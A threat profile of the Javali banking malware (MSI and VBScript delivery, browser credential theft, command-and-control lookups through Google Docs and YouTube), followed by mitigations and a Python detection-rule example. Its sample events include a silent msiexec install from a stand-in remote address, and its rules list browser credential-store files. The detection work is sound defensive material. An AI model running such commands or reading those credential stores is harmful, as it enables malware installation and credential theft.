The malware known as Javali targets Portuguese- and Spanish-speaking countries, primarily focusing on customers of financial institutions in Brazil and Mexico. Javali affects Windows and can monitor processes for open browsers and custom banking applications. Javali can download payloads from remote C2 servers. Javali has used the MSI installer to download and execute malicious payloads. Javali has achieved execution through victims clicking links to malicious websites. Javali has used embedded VBScript to download malicious payloads from C2. Javali has been delivered as a malicious e-mail attachment.
Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge. Javali can use large obfuscated libraries to hinder detection and analysis. Javali can read C2 information from Google Documents and YouTube. Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.
Javali Malware Capabilities:
Javali may attempt to get information about running processes on a system in order to gain an understanding of common software/applications running on systems within the network. Additionally, Javali may abuse msiexec.exe to proxy execution of malicious payloads and may also abuse Visual Basic for execution. Furthermore, Javali may send spearphishing emails with a malicious attachment or link in an attempt to gain access to victim systems. Finally, Javali may acquire credentials from web browsers by reading files specific to the target browser.
- Javali may enumerate running processes to learn which software and applications are common on systems within the network. Additionally, Javali may transfer tools or other files from an external system into a compromised environment in order to spread malicious payloads.
- The Javali adversary may gain execution on victim systems in several ways, including spearphishing emails with malicious attachments, links that lead to code execution, or exploitation of vulnerabilities in applications or browsers. Once execution is gained, the adversary may attempt to access sensitive data or systems on the victim network.
- The Javali group is a cybercriminal organization that uses spearphishing and other methods to gain access to victim systems. It may also side-load DLLs to execute malicious payloads.
- Javali may use binary padding, or an existing, legitimate external web service that hosts information pointing to additional command and control infrastructure. The adversary may rely on a user opening a malicious file in order to gain execution, and users may be subjected to social engineering to get them to open a file that leads to code execution.
Ways to Mitigate Javali Malware Attacks
Javali attacks can be mitigated by monitoring file creation and transfer, as well as process execution of msiexec.exe. The arguments used before and after msiexec.exe is invoked can help determine the purpose of the MSI files or DLLs being executed.
- Inspect network traffic for indications of a malicious site visit, monitor for events associated with VB execution, and use network intrusion detection systems and email gateways to detect spearphishing with malicious attachments.
- Monitor process activity for unusual behavior, track DLL metadata, and inspect URLs for links to known malicious sites. Additionally, web browser files that contain credentials can be monitored for file read events, and process execution logs can be monitored for PowerShell Transcription activity.
- Use file-based signatures to detect padded files, host data to supplement existing indicators of compromise, and user behavior monitoring to detect abnormal patterns of activity.
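The following is an added example, not part of the original profile, showing how the msiexec.exe, VBScript-host and browser-credential-file monitoring described above can be expressed as simple detection rules. It runs over constructed Sysmon-style process-creation and file-read events (the sample paths, parent processes and the 203.0.113.10 address are invented for illustration); the rule names and field layout are assumptions, not a real product's schema.

```python
"""Toy detection rules for the Javali-style behaviours listed above.
Evaluates constructed process-creation and file-read events; field names
(type, image, parent, cmdline, path) are an assumed Sysmon-like layout."""
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (illustrative only, not real Javali logs).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r"msiexec.exe /q /i http://203.0.113.10/update.msi"},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\inst.vbs"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\7zip.msi /qn"},   # benign local install
    {"type": "file_read", "image": r"C:\Windows\System32\wscript.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_read", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
USER_APPS = BROWSERS | {"outlook.exe", "winword.exe", "excel.exe"}
# Credential stores of the browsers named in the profile (Chromium and Firefox).
CRED_FILES = {"login data", "logins.json", "key4.db", "web data"}

def base(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()

def evaluate(event):
    """Return the list of rule names the event matches (empty if none)."""
    hits = []
    if event["type"] == "process":
        img, parent, cmd = base(event["image"]), base(event["parent"]), event["cmdline"]
        # MSI installer pulling a remote package, or launched from mail/Office/browser.
        if img == "msiexec.exe" and (URL_RE.search(cmd) or parent in USER_APPS):
            hits.append("msiexec_remote_or_user_spawned")
        # VBScript host started by an installer or a user-facing application.
        if img in SCRIPT_HOSTS and parent in USER_APPS | {"msiexec.exe"}:
            hits.append("vbscript_host_from_installer_or_office")
    elif event["type"] == "file_read":
        # Browser credential store read by something other than the browser itself.
        if base(event["path"]) in CRED_FILES and base(event["image"]) not in BROWSERS:
            hits.append("browser_credential_store_read_by_non_browser")
    return hits

def scan(events):
    """Return (index, matched rules) for every event that triggers a rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := evaluate(e))]
```

Running `scan(SAMPLE_EVENTS)` flags the remote MSI install, the installer-spawned script host and the script host reading Chrome's credential store, while the service-launched local install and Chrome's own file access pass silently.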